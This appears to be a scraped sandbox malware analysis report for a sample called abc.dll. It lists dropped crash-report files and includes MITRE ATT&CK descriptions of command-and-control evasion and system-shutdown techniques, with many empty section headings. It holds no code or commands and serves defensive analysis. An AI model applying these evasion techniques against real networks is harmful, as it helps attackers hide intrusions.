Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report abc.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\1.txt

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_80fa17708444a2c77e77e66eb43423f94a9dfb63_82810a17_06abaaff\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_80fa17708444a2c77e77e66eb43423f94a9dfb63_82810a17_0a7b9719\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8259.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8874.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A2B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C88.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA207.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA360.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
abc.dll

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre